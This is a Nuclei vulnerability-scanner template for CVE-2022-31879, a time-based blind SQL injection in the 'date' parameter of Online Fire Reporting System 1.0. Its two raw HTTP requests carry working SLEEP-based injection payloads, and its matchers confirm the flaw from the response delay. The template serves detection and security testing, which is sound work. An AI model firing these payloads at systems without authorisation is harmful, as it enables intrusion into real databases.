nuclei-templates/http/cves/2022/CVE-2022-31879.yaml

47 lines
1.6 KiB
YAML

id: CVE-2022-31879
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat,j4vaovo
severity: high
description: |
Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-31879
cwe-id: CWE-89
epss-score: 0.04694
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 == 200'
- 'duration_2 - duration_1 >= 7'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Dashboard")'
condition: and